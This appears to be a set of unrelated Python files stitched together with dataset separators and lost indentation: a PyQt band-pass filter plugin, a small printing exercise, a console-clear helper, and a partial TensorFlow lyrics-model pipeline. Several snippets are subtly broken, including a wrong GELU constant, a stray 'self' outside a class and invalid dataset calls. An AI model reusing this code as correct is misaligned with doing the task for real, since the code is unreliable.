if not hasattr(app, 'bandpassfilters'):
app.bandpassfilters={}
for l in app.plot.lines:
bpw=app.bandpassfilters.get(l) or BandPassWidget(app,l)
app.bandpassfilters[l]=bpw
i+=1
#lbl=QtGui.QLabel("Line %d"%i)
row=i-1
#bpw.f1.setMaximum(app.plot.samplerate/2)
#bpw.f2.setMaximum(app.plot.samplerate/2)
#qslo.addWidget(lbl,row,0)
col=0
for w in bpw.widgets:
#w.resize(30,10)
qslo.addWidget(w,row,col)
col+=1
def paintEvent(self, *args, **kwargs):
"""
hook into paintevent to resize the second grid layout according to the first one
"""
QtGui.QDialog.paintEvent(self, *args, **kwargs)
try:
if self.colsAdjusted>2:return
header=self.header[:]
cols=self.app.bandpassfilters.values()[0].widgets
for i in range(min(len(header),len(cols))):
w1=cols[i].width()
w2=header[i].width()
if w1>w2: header[i].setMinimumWidth(w1)
else : cols[i].setMinimumWidth(w2)
self.colsAdjusted+=1
self.update()
except Exception,e: print e
def restore(self):
"""
restore the window when it was previously closed
"""
self.show()
self.activateWindow()
def hideEvent(self, *args, **kwargs):
"""
Closing the window doesnt destroy it by default.
Force destruction Destruction
"""
self.destroy()
FilterDialog.instance=None
return QtGui.QDialog.hideEvent(self, *args, **kwargs)
class BandPassWidget(QtGui.QWidget):
"""
This class holds all widgets for adjusting the filteroptions.
"""
def __init__(self, app,line):
"""
Create all neccessary widgets
@type app: gui.qtgui.UI_Main
"""
QtGui.QWidget.__init__(self,app)
filters=["butter","cheby1","cheby2","ellip","bessel"]
btypes=["band","low","high"]
srate=app.plot.samplerate/2
self.plot=app.plot
self.line=line
lbl=QtGui.QLabel("Line %d"%self.plot.lines.index(line))
self.setWindowTitle("BandPass")
self.f1=QtGui.QSpinBox()
self.f2=QtGui.QSpinBox()
self.f1.setMaximum(99999999)
self.f2.setMaximum(99999999)
self.f1.setMinimumWidth(60)
self.f2.setMinimumWidth(60)
self.f2.setValue(srate)
self.filterBox=QtGui.QComboBox()
self.filterBox.addItems(filters)
self.btypesBox=QtGui.QComboBox()
self.btypesBox.addItems(btypes)
self.useFftCb=QtGui.QCheckBox()
self.useFftCb.stateChanged.connect(self.restart)
self.useFft=0
self.useFftFallBack=0
self.inv=QtGui.QCheckBox()
self.en=QtGui.QCheckBox()
self.orderW=QtGui.QSpinBox()
self.orderW.setMinimum(1)
self.widgets=[lbl,self.filterBox,self.btypesBox,self.orderW,self.f1,self.f2,self.useFftCb,self.inv,self.en]
self.bpf=IIRFilter(line.buffer.data, 0, srate,app.plot.samplerate)
self.f1.valueChanged.connect(self.changed)
self.f2.valueChanged.connect(self.changed)
self.orderW.valueChanged.connect(self.changed)
self.en.stateChanged.connect(self.toggle)
self.inv.stateChanged.connect(self.changed)
self.btypesBox.currentIndexChanged.connect(self.changed)
self.filterBox.currentIndexChanged.connect(self.changed)
app.plot.sigBufferChanged.connect(self.bufchanged)
def bufchanged(self):
"""
Update the filters frequency scaling on bufferlength-changes
"""
self.bpf.updateValues(self.line.buffer.data)
def changed(self,*args,**kwarg):
"""
Update the filter according to the changed values in gui
"""
f1=self.f1.value()
f2=self.f2.value()
if f2>self.plot.samplerate/2:f2=self.plot.samplerate/2
btype=self.btypesBox.currentText()
self.f1.setEnabled(True)
self.f2.setEnabled(True)
if btype=='low':
self.f1.setEnabled(False)
f1=False
elif btype=='high':
self.f2.setEnabled(False)
f2=False
elif btype=='band':
if f1>f2:f1=f2
self.f1.setValue(f1)
self.f2.setValue(f2)
if self.useFftCb.isChecked(): self.useFft=1
else: self.useFft=0
#try to use iir filter when in fallbackmode
if self.useFftFallBack:
self.useFftFallBack=0
self.useFft=0
self.useFftCb.setChecked(False)
try:self.bpf.updateValues(self.line.buffer.data,f1, f2,self.inv.isChecked(),
order=self.orderW.value(),ftype=str(self.filterBox.currentText()))
except ValueError:
#Fallback to FFT filter-fode
if not self.useFft:
self.useFftCb.setChecked(1)
self.useFft=1
self.toggle()
self.useFftFallBack=1
return
def toggle(self):
"""
Toggle the filter on or off.
"""
#remove all filter added by this plugin
try:
while 1:self.line.prefilters.remove(self.bpf.getData)
except: pass
try:
while 1:self.line.preappend_filters.remove(self.bpf.iirArr)
except: pass
#add filter as specified by the user
if self.en.isChecked():
if self.useFft:
self.line.prefilters.append(self.bpf.getData)
else:
self.line.preappend_filters.append(self.bpf.iirArr)
def restart(self):
self.changed()
if self.en.isChecked():
self.en.setChecked(False)
self.toggle()
self.en.setChecked(True)
self.toggle()
import numpy as np
try:
from scipy import fftpack as fft
except ImportError:
from numpy import fft
from gui.plot2 import bestFFTlength
import time
class BandPassFilter:
"""
A Filter based on FFT.
"""
def __init__(self,a,f1,f2,srate):
"""
:param a: numpy_array with data to filter
:param f1, lower cutoff frequency. Filter is low pass if f1=0
:param f2, upper cutoff frequency. Filter is highpass if f2=0
:param srate: Samplerate
"""
self.srate=srate
self.a=a
self.ftype='butter'
self.inverted=False
self.order=1
self.updateValues(a,f1,f2,False)
def getData(self,x,y):
"""
return the filtered data
"""
y=y[:self.bestfftl]
out= x[:self.bestfftl],np.real(fft.ifft(fft.fft(y)*self.af))
return out
def getarray(self,arr):
#if arr.shape[0]!=self.af.shape[0]: pass
return np.real(fft.ifft(fft.fft(arr)*self.makeAf(arr)))
def makeAf(self,arr):
i1=self.i1=self.f1*len(arr)/self.srate+1
i2=self.i2=self.f2*len(arr)/self.srate+1
self.af=np.zeros(arr.shape[0])
self.af[i1:i2]=1
self.af[-i2:-i1]=1
return self.af
def updateValues(self,a=None,f1=None,f2=None,inverted=None,order=None,ftype=None):
"""
Update filter params
:param a: data array
:param f1: lower cutoff freq
:param f2: upper cutoff freq
:param order: the filters order
:param ftype (str): the filtertype, one of butter, cheby1 cheby2, ellip or bessel
:raise exception: ValueError if filter will be unstable
"""
if f1 is not None: self.f1=f1
if f2 is not None: self.f2=f2
if a is not None:self.a = a
if order: self.order=order
if ftype is not None and ftype in ['butter','cheby1','cheby2','ellip','bessel']:
self.ftype=ftype
i1=self.i1=self.f1*len(self.a)/self.srate if self.f1 else False
i2=self.i2=self.f2*len(self.a)/self.srate if self.f2 else False
self.bestfftl=bestFFTlength(len(self.a))
self.a=self.a[:self.bestfftl]
if not inverted:
self.af=self.makeG(i1, i2)
#self.af=np.zeros(self.a.shape[0])
#self.af[i1:i2]=1
#self.af[-i2:-i1]=1
else:
self.af=np.ones(self.a.shape[0])
self.af[i1:i2]=0
self.af[-i2:-i1]=0
def _makeG(self,i1,i2):
x=np.arange(1,self.a.shape[0]+1,dtype="f")*1j
l=self.a.shape[0]
n=self.order#*2
print i1,i2,l
y=None
if not i1: y=1/(1+(x/i2)**(2*n))
elif not i2: y=1/(1+(i1/x)**(2*n))
else:y=1/(1+(i1/x)**(2*n))*1/(1+(x/i2)**(2*n))
y=y**0.5
try: y[l/2::]=y[:l-l/2][::-1]
except ValueError: pass
return np.abs(y)
def makeG(self,i1,i2):
"""
Generates Gainfunction G(s)=|H(s)|
"""
print "makingG:",i1,i2
x=np.arange(1,self.a.shape[0]+1,dtype='f')
k=1 #gain factor
n=self.order
if i1 and i2:
x=tflpbp(x, i1, i2)
#n=2*n
elif i1:
x=tflphp(x, i1)
elif i2:
x=tflplp(x, i2)
y=None
if self.ftype=='butter': y=gButter(x, n)
elif self.ftype=='cheby1': y=gCheby1(x, n)
k=1/np.nanmax(y)
print i1,i2,k
l=self.a.shape[0]
y[l/2::]=y[:l-l/2][::-1]
return y*k
from threading import Lock
class IIRFilter(BandPassFilter):
def __init__(self, a, f1, f2, srate):
self.iir=IIR(f1=f1,f2=f2,samplerate=srate)
self.lock=Lock()
BandPassFilter.__init__(self, a, f1, f2, srate)
def updateValues(self, a=None, f1=None, f2=None, inverted=None, order=1,ftype='butter'):
BandPassFilter.updateValues(self, a=a, f1=f1, f2=f2, inverted=inverted, order=order,ftype=ftype)
btype='bandpass'
if f1 is not None or f2 is not None:
if f1: f1=f1/(0.5*self.srate)
if f2: f2=f2/(0.5*self.srate)
fs=(f1,f2)
if not f1 and f2:
fs=f2
btype='lowpass'
if not f2 and f1:
fs=f1
btype='highpass'
b,a=iirfilter(order,fs,ftype=ftype,btype=btype,rp=.1,rs=10)
#print b,a
stable=np.all(np.abs(np.roots(a))<1)
if not stable:
raise ValueError("The filter is not stable")
#TODO: Fallback to fft mode
with self.lock:
self.iir.set_ba(b,a)
#self.iir=IIR(b,a)
def iirArr(self,arr):
out=[]
with self.lock:
out=self.iir.filterArr(arr)
#print np.asarray(out)
return out
pass
def butterpoles(n,k):
return np.exp(1j*(2*k+n-1)*np.pi/2/n )
def butter(x,n):
dn=1
for k in xrange(n): dn*=x-butterpoles(n, k)
return 1/dn
def gButter(x,n):
return 1/(1+x**(2*n))**0.5
def gCheby1(x,n,epsilon=.1):
return 1/(1+(epsilon*cheby(x,n))**2)**0.5
def gCheby2(x,n,epsilon=.1):
return 1/(1+1/(epsilon*cheby(1/x,n))**2)**0.5
def cheby(x,n):
x1 = lambda x:np.cos(n*np.arccos(x))
x2=lambda x: np.cosh(n*np.arccosh(x))
return np.piecewise(x,[x<=1,x>1],[x1,x2])
def tflplp(x,fc): return x/fc
def tflphp(x,fc): return fc/x
def tflpbp(x,f1,f2):
f0=(f1*f2)**.5
df=f2-f1
q= f0/df
return q*(x/f0+f0/x)
plugins.append(BandPass) | StarcoderdataPython |
3288405 | '''
Write a program to get integers m and n (n is an even number), then display m lines of the output.
Each line shows n symbols. The first half (1 to n / 2) of each line displays ‘>’ and the second half (n / 2 +
1 through n) display ‘<’.
'''
m, n = map(int, input().split())
for _ in range(m):
print('>'*(n//2), '<'*(n//2), sep='')
| StarcoderdataPython |
101452 | <filename>help/help.py
from os import path, system, name
def clear():
"""
Clear console function os-independent
:return: NoneType
"""
if name == 'nt':
system('cls')
else:
system('clear')
| StarcoderdataPython |
4806574 | import math
import tensorflow
import tensorflow as tf
import tensorflow_datasets as tfds
import tensorflow_addons as tfa
import json
import os
import time
from ftfy import fix_text
#:os.chdir('../')
import pickle
import numpy as np
import string, os
from gensim.models import KeyedVectors
import gensim.downloader as api
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Input, Dropout, LSTM, Activation, Bidirectional
from tensorflow.keras.layers import Embedding
from tensorflow.keras.preprocessing import sequence
from tensorflow.keras.initializers import glorot_uniform
from tensorflow.keras.callbacks import LambdaCallback, ModelCheckpoint
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
import tensorflow.keras.utils as ku
from sklearn.model_selection import train_test_split
import random
import sys
from datetime import date
from collections import Counter
import matplotlib.pyplot as plt
from src.features.build import Lyrics
from src.features.transform_data import Transform
from random import shuffle
from tensorflow.python.framework import tensor_shape
from tokenizers import CharBPETokenizer, BertWordPieceTokenizer
from transformers import GPT2Model, GPT2Config, GPT2Tokenizer
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], enable=True)
def clean_text(txt):
txt = "".join(v for v in txt if v not in string.punctuation).lower()
txt = txt.encode("utf8").decode("ascii",'ignore')
return txt
def split_input_target(chunk):
input_text = chunk[:-1]
target_text = chunk[1:]
return input_text, target_text
def load_data():
data_dir = 'data/processed/verses.txt'
with open(data_dir, "r") as fp: # Unpickling
lyrics = fp.read()
lyrics_clean = clean_text(lyrics)
def word_based():
_t = Lyrics(32,10000)
#arr = _t.verse_lines
corpus = _t.lyrics
tokenizer = Tokenizer()
def get_sequence_of_tokens(corpus):
## tokenization
tokenizer.fit_on_texts(corpus)
total_words = len(tokenizer.word_index) + 1
# convert data to sequence of tokens
input_sequences = []
for line in corpus:
token_list = tokenizer.texts_to_sequences([line])[0]
for i in range(1, len(token_list)):
n_gram_sequence = token_list[:i+1]
input_sequences.append(n_gram_sequence)
return input_sequences, total_words
inp_sequences, total_words = get_sequence_of_tokens(corpus)
num_words = total_words
print(inp_sequences[:10])
input_sequences = inp_sequences
max_sequence_len = max([len(x) for x in input_sequences])
#input_sequences = np.array(pad_sequences(input_sequences, maxlen=max_sequence_len+1, padding='pre'))
predictors, label = input_sequences[:,:-1],input_sequences[:,-1]
return tokenizer, num_words, tf.data.from_tensor_slices((predictors, label))
# In[ ]:
# def tf_encode(pt, en):
# result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
# result_pt.set_shape([None])
# result_en.set_shape([None])
#
# return result_pt, result_en
#
#
# def filter_max_length(x, y, max_length=MAX_LENGTH):
# return tf.logical_and(tf.size(x) <= max_length,
# tf.size(y) <= max_length)
#
# def fetch_dataset(train_dataset, val_dataset, batch_size, padded_shapes=([-1], [-1]), epoch=25, buffer_size=10000):
# train_dataset = train_dataset.map(tf_encode)
# train_dataset = train_dataset.filter(filter_max_length)
# # cache the dataset to memory to get a speedup while reading from it.
# train_dataset = train_dataset.cache()
# train_dataset = train_dataset.shuffle(buffer_size).padded_batch(batch_size)
# train_dataset = train_dataset.repeat(epoch)
# train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
#
#
# val_dataset = val_dataset.map(tf_encode)
# val_dataset = val_dataset.filter(filter_max_length).padded_batch(batch_size)
# return train_dataset, val_dataset
def verse_pairs_approach(target_vocab_size=2**12):
_t = Transform()
arr = [i for i in _t.verse_lines if len(i) > 0]
dataset = list()
for verse in arr:
if max([len(i.split()) for i in verse]) > 1 and max([len(i.split()) for i in verse]) < 25:
chunk_number = len(verse) // 4
# chunks = [verse[x:x+chunk_number] for x in range(0, len(verse), chunk_number)]
if chunk_number != 0:
chunks = ['<START> ' + ''.join([ j + ' <NEWLINE> ' for j in verse[x:x+chunk_number]]) + ' <END>' for x in range(0, len(verse), chunk_number)]
chunks = [chunk for chunk in chunks if len(chunk.split('<NEWLINE>')) > 2]
dataset.append((chunks[:2], chunks[2:]))
# for i in arr:
# tmp = [ ' <NEWLINE> '.join([clean_text(j[0]), clean_text(j[1])]) for j in zip(i[0::2],i[1::2])]
# dataset.append([z for z in zip(tmp[0::2], tmp[1::2])])
example = [x[0] for x in dataset]
target = [x[1] for x in dataset]
print(example[:2], target[:2])
X_train, X_test, y_train, y_test = train_test_split(example, target, test_size=0.10, shuffle=True)
len(X_train)
train_examples = tf.data.Dataset.from_tensor_slices((X_train, y_train))
val_examples = tf.data.Dataset.from_tensor_slices((X_test, y_test))
tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(pt.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size, reserved_tokens=['<UNK>','<NEWLINE>','<START>','<END>'])#, reserved_tokens=['<UNK>'])
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size,reserved_tokens=['<UNK>','<NEWLINE>','<START>','<END>']) #reserved_tokens=['<UNK>'])
BUFFER_SIZE = 15000
BATCH_SIZE = 32
def encode(lang1, lang2):
lang1 = [tokenizer_pt.vocab_size] + tokenizer_pt.encode(lang1.numpy()) + [tokenizer_pt.vocab_size+1]
lang2 = [tokenizer_en.vocab_size] + tokenizer_en.encode(lang2.numpy()) + [tokenizer_en.vocab_size+1]
return lang1, lang2
def tf_encode(pt, en):
result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
result_pt.set_shape([None])
result_en.set_shape([None])
return result_pt, result_en
MAX_LENGTH = 125
def filter_max_length(x, y, max_length=MAX_LENGTH):
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
train_dataset = train_examples.map(tf_encode)
train_dataset = train_dataset.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
train_dataset = train_dataset.cache()
train_dataset = train_dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
val_dataset = val_examples.map(tf_encode)
val_dataset = val_dataset.filter(filter_max_length).padded_batch(BATCH_SIZE)
return train_dataset, val_dataset, tokenizer_en, tokenizer_pt
def verse_by_verse(test_size=.10, shuffle=False, target_vocab_size=2**12):
_t = Transform()
arr = _t.verse_lines
dataset = list()
for verse in arr:
x = verse[0::2]
y = verse[1::2]
#[print(i) for i in zip(x, y)]
# dataset +=
#print(dataset[0])
if shuffle:
np.random.shuffle(dataset)
train = dataset[:round(len(dataset) * test_size)]
test = dataset[round(len(dataset) * test_size):]
train_examples = tf.data.Dataset.from_tensor_slices(train)
val_examples = tf.data.Dataset.from_tensor_slices(test)
tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(en.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)
tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
(pt.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)
return train_examples, val_examples, tokenizer_en, tokenizer_pt
def fill_in_the_blank(test_size=.10, shuffle=False, target_vocab_size=2**12):
_t = Transform()
arr = _t.verse_lines
data_dir = 'data/processed/verses.txt'
with open(data_dir, "rb") as fp: # Unpickling
lyrics = pickle.load(fp)
arr = [[j for j in i.split(' \n ') if len(j) > 1 and '\n\n' != j] for i in list(np.array(lyrics)) if len(i.split(' \n ')) > 0]#tokenizer = BertWordPieceTokenizer()
#tokenizer.train(['data/processed/verses_encoded.txt'])
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
#special_tokens_dict = {'bos_token':'|START|', 'eos_token':'|END|', 'unk_token':'|UNK|', 'sep_token':'|SEP|', 'pad_token':'|PAD|', 'cls_token':'|CLS|', 'mask_token':'|MASK|'}
#num_added_toks = tokenizer.add_special_tokens(special_tokens_dict)
#print('We have added', num_added_toks, 'tokens')
#model.resize_token_embeddings(len(tokenizer))
#tokenizer.add_tokens(['<START>','<END>'])
dataset = list()
for verse in arr:
num_times = random.randint(1, 5)
try:
if max([len(i.split()) for i in verse]) > 1 and max([len(i.split()) for i in verse]) < 50:
chunk_number = len(verse) // 3
chunks = [verse[x:x+chunk_number] for x in range(0, len(verse), chunk_number)]
#chunks = ['<START> ' + ''.join([ j for j in verse[x:x+chunk_number]]) for x in range(0, len(verse), chunk_number)]
#chunks = [chunk for chunk in chunks if len(chunk.split('<NEWLINE>')) > 2]
chunk_list = [' '.join(chunk_verse).split() for chunk_verse in chunks]
for chunk in chunk_list:
for _ in range(0, num_times,1):
mask = np.random.random(len(chunk))
mask_bool = random.uniform(.3, .4)
mask_x = mask > mask_bool
mask_y = mask < mask_bool
x = '<START> ' + ' '.join(['[MASK]' if not x else chunk[i] for i, x in enumerate(mask_x)]) + ' <END>'
#x = ' '.join(np.array(verse)[mask_x].tolist())
#y = ' '.join(np.array(chunk).tolist())
#$y = ' '.join(['' if not x else chunk[i] for i, x in enumerate(mask_y)])
#y = '|<GAP>|'.join(['' if not x else chunk[i] for i, x in enumerate(mask_y)])
y = '<START> ' + ' '.join(['[MASK]' if x else chunk[i] for i, x in enumerate(mask_x)]) + ' <END>'
# = ' '.join([np.array(i)[mask_y] for i in chunk])
# x = ' '.join(np.array(chunk)[mask_x].tolist())
# y = ' '.join(np.array(chunk)[mask_y].tolist())
#x = ' '.join([' ' if not x else chunk.split(' ')[i] for i, x in enumerate(mask_x)])
#x = ' '.join([' ' if not x else chunk.split(' ')[i] for i, x in enumerate(mask_x)])
#y = chunk
dataset.append((x, y))
except ValueError:
pass
print(dataset[0])
example = np.array(pad_sequences([tokenizer.encode(x[0]) for x in dataset], padding='post'))
target = np.array(pad_sequences([tokenizer.encode(x[1]) for x in dataset], padding='post'))
# target = [tokenizer.encode(x[1]).ids for x in dataset]
print(len(dataset))
print(dataset[0])
X_train, X_test, y_train, y_test = train_test_split(example, target, test_size=0.10, shuffle=True)
train_examples = tf.data.Dataset.from_tensor_slices((X_train, y_train))
val_examples = tf.data.Dataset.from_tensor_slices((X_test, y_test))
#tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
# (pt.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)#, reserved_tokens=['<UNK>'])
#tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
# (en.numpy() for pt, en in train_examples), target_vocab_size=target_vocab_size)#,reserved_tokens=['<UNK>'])
BUFFER_SIZE = 15000
BATCH_SIZE = 64
def encode(lang1, lang2):
lang1 = [tokenizer.get_vocab_size()] + tokenizer.encode(lang1.numpy()).ids + [tokenizer.get_vocab_size()+1]
lang2 = [tokenizer.get_vocab_size()] + tokenizer.encode(lang2.numpy()).ids + [tokenizer.get_vocab_size()+1]
return lang1, lang2
#
def tf_encode(pt, en):
result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
result_pt.set_shape([None])
result_en.set_shape([None])
#
return result_pt, result_en
#
MAX_LENGTH = 125
#
#
#
def filter_max_length(x, y, max_length=MAX_LENGTH):
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
#train_dataset = train_examples.map(tf_encode)
#train_dataset = train_dataset.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
train_dataset = train_examples.cache()
# train_dataset = train_dataset.repeat(25)
train_dataset = train_dataset.shuffle(BUFFER_SIZE).padded(BATCH_SIZE)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
#val_dataset = val_examples.map(tf_encode)
val_dataset = val_examples.padded_batch(BATCH_SIZE)
return train_dataset, val_dataset, tokenizer#, tokenizer_pt
def window_based(test_size=.10, shuffle=False, target_vocab_size=2**12):
test_size = 1 - test_size
dataset = list()
_t = Lyrics(32, 1000)
data_dir = 'data/processed/verses_encoded.txt'
with open(data_dir, "r") as fp: # Unpickling
lyrics = fp.read()
tokenizer = BertWordPieceTokenizer()
tokenizer.train(['data/processed/verses_encoded.txt'])
tokenizer.add_tokens(['<START>','<END>','<NEWLINE>'])
arr = [[clean_text(j).replace('newline','<NEWLINE>').replace('start','<START>').replace('end','<END>') for j in i.split(' \n ') if len(j) > 1 and '\n\n' != j] for i in list(np.array(lyrics.split('\n\n'))) if len(i.split(' \n ')) > 0]
# print(arr)
# for verse in arr:
# chunk_number = len(verse) // 5
# if chunk_number > 0:
# chunks = ['<START> ' + ''.join([ j.replace('\n','').replace('\n\n','') + ' <NEWLINE> ' for j in verse[x:x+chunk_number]]) + ' <END>' for x in range(0, len(verse), chunk_number)]
# chunks = [chunk for chunk in chunks if len(chunk.split('<NEWLINE>')) > 2]
# print()
# dataset.append(chunks)
# train = dataset
train = [y for x in arr for y in x]
train = [tokenizer.encode(i).ids for i in train]
train = [y for x in train for y in x]
# train.split('<NEWLINE>')
# print(train)
# train = ' <EOV> '.join(dataset)
# print(train)
# tokenizer.add_tokens(['<START>','<END>','<NEWLINE>','<EOV>'])
# target = _t.target
# target = [x[1] for x in dataset]
# print(len(dataset))
# X_train, X_test, y_train, y_test = train_test_split(example, target, test_size=0.10, shuffle=True)
# train_dataset = tf.data.Dataset.from_tensor_slices((X_train, y_train))
# print(len(dataset))
# np.random.shuffle(dataset)
# train_test = dataset[:round(len(dataset) * test_size)]
# train = train_test[:round(len(train_test) * test_size)]
# test = train_test[round(len(train_test) * test_size):]
# val = dataset[round(len(dataset) * test_size):]
# train_dataset = tf.data.Dataset.from_tensor_slices(train)
# tokenizer = BertWordPieceTokenizer("data/processed/vocab.txt", lowercase=True)
# tokenizer = tfds.features.text.SubwordTextEncoder.build_from_corpus((en.numpy() for en in train_dataset), target_vocab_size=target_vocab_size, reserved_tokens=['<UNK>','<NEWLINE>','<START>','<END>'])
train_dataset = tf.data.Dataset.from_tensor_slices(train)
seq_length = 40
# examples_per_epoch = len(train.split())//(seq_length+1)
# data = [i for i in flattened_list if len(i) < 100]
sequences = train_dataset.batch(seq_length+1, drop_remainder=True)
dataset = sequences.map(split_input_target)
# Batch size
BATCH_SIZE = 128
# Buffer size to shuffle the dataset
# (TF data is designed to work with possibly infinite sequences,
# so it doesn't attempt to shuffle the entire sequence in memory. Instead,
# it maintains a buffer in which it shuffles elements).
BUFFER_SIZE = 20000
dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE)
dataset = dataset.repeat(50)
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
print(dataset)
return dataset, tokenizer
def simple_method(sequence_size, testSetRatio=0.15):
testSetRatio = 1-testSetRatio
data_dir = 'data/processed/verses_test.txt'
with open(data_dir, "rb") as fp: # Unpickling
lyrics = pickle.load(fp)
arr = [' <NEWLINE> '.join([clean_text(j) for j in i.split(' \n ') if len(j) > 1 and '\n\n' != j]) for i in list(np.array(lyrics)) if len(i.split(' \n ')) > 0]
#tokenizer = BertWordPieceTokenizer()
#tokenizer.train(['data/processed/verses_encoded.txt'])
tokenizer = GPT2Tokenizer.from_pretrained('gpt2-xl')
#tokenizer.train(['data/processed/verses_encoded.txt'])
special_tokens_dict = {'eos_token':'<END>','sep_token':'<NEWLINE>','bos_token':'<START>'}
num_added_toks = tokenizer.add_special_tokens(special_tokens_dict)
print(tokenizer.encode(' <NEWLINE> '))
tokenizer.save_pretrained('src/data/tokenizers')
dataset = list()
for verse in arr:
tmp = list()
verse = ' <START> ' + verse + ' <END> '
verse_split = verse.split(' <NEWLINE> ')
for line in verse_split:
tmp = tmp + tokenizer.encode(line + ' <NEWLINE>', add_prefix_space=True)
if tmp:
dataset.append(tmp)
print(dataset[0])
# dataset = [[item for sublist in verse.split(' \n ') for tokenizer.encode(item, add_prefix_space=True) in sublist] for verse in arr]
np.random.shuffle(dataset)
verse_length = [len(verse) for verse in dataset]
verse_average = sum(verse_length) / len(verse_length)
print(f'Average number of words in a verse {verse_average}')
# dataset = dataset[
train = dataset[:round(len(dataset) * testSetRatio)]
test = dataset[round(len(dataset) * testSetRatio):]
print(f'train size {len(train)}')
print(f'test size {len(test)}')
trainTensor = simple_pipeline(train, sequence_size)
testTensor = simple_pipeline(test, sequence_size)
return trainTensor, testTensor, tokenizer
def simple_pipeline(dataset, sequence_size):
dataset = [y for x in dataset for y in x]
assert isinstance(dataset[0], int)
print(f'number of tokens {len(dataset)}: \n{dataset[:5]}')
train = tf.data.Dataset.from_tensor_slices(dataset)
train = train.window(sequence_size, drop_remainder=True)
for window in train.take(5):
print(list(window.as_numpy_iterator()))
train = train.flat_map(lambda window: window.batch(sequence_size))
train = train.shuffle(10000).batch(64)
train = train.map(lambda windows: (windows[:,:-1], windows[:,1:]))
# train = train.cache()
train = train.prefetch(tf.data.experimental.AUTOTUNE)
return train
def gelu(x):
with tf.name_scope("gelu"):
cdf = 0.35 * (1.0 + tf.tanh((np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))
return x * cdf
def shape_as_list_2(x):
return [int(i) for i in tf.shape(x)]
def get_padding_mask(seq):
with tf.name_scope("Padding_Mask"):
seq = tf.cast(tf.math.equal(seq, 0), tf.float32)
# add extra dimensions to add the padding
# to the attention logits.
return seq[:, tf.newaxis, tf.newaxis, :] # (batch_size, 1, 1, seq_len)
def attention_mask(size):
with tf.name_scope("attention_mask"):
mask = 1 - tf.linalg.band_part(tf.ones((size, size)), -1, 0)
return mask # (seq_len, seq_len)
def create_masks(inp):
with tf.name_scope("attn_masking"):
# Encoder padding mask
att_mask = attention_mask(tf.shape(inp)[1])
# Used in the 2nd attention block in the decoder.
# This padding mask is used to mask the encoder outputs.
padding_mask = get_padding_mask(inp)
mask = tf.maximum(padding_mask, att_mask)
return mask
def scaled_dot_product_attention(q, k, v, training, mask=None):
"""
Calculate the attention weights.
q, k, v must have matching leading dimensions.
k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.
The mask has different shapes depending on its type(padding or look ahead)
but it must be broadcastable for addition.
Args:
q: query shape == (..., seq_len_q, depth)
k: key shape == (..., seq_len_k, depth)
v: value shape == (..., seq_len_v, depth_v)
mask: Float tensor with shape broadcastable
to (..., seq_len_q, seq_len_k). Defaults to None.
Returns:
output, attention_weights
"""
matmul_qk = tf.matmul(q, k, transpose_b=True) #(..., seq_len, seq_len_k)
# scale matmul_qk
if self.scale:
dk = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)
# add the mask to the scaled tensor
if mask is not None:
scaled_attention_logits += (mask * -1e9)
# softmax is normalized on the last axis (seq_len_k) for scores to add up to 1
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)
output = tf.matmul(attention_weights, v)
return output, attention_weights
def print_out(q, k, v):
temp_out, temp_attn = scaled_dot_product_attention(
q, k, v, None
)
print('Attention weights are:')
print(temp_attn)
print('Output is:')
print(temp_out)
class MultiHeadAttention(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, att_dropout=0.4,
residual_dropout=0.45, scale=True):
super(MultiHeadAttention, self).__init__()
self.num_heads = num_heads
self.d_model = d_model
self.att_dropout = att_dropout
self.residual_dropout=residual_dropout
self.scale=scale
assert d_model % self.num_heads == 0
self.depth = d_model // self.num_heads
self.c_attn = Conv1d(self.d_model, self.d_model * 3)
self.c_proj = Conv1d(self.d_model, self.d_model)
def multihead_attention(self, q, k, v, training, mask=None):
"""
Calculate the attention weights.
q, k, v must have matching leading dimensions.
k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.
The mask has different shapes depending on its type(padding or look ahead)
but it must be broadcastable for addition.
Args:
q: query shape == (..., seq_len_q, depth)
k: key shape == (..., seq_len_k, depth)
v: value shape == (..., seq_len_v, depth_v)
mask: Float tensor with shape broadcastable
to (..., seq_len_q, seq_len_k). Defaults to None.
Returns:
output, attention_weights
"""
matmul_qk = tf.matmul(q, k, transpose_b=True) #(..., seq_len, seq_len_k)
# scale matmul_qk
if self.scale:
dk = tf.cast(tf.shape(k)[-1], tf.float32)
matmul_qk = matmul_qk / tf.math.sqrt(dk)
# add the mask to the scaled tensor
if mask is not None:
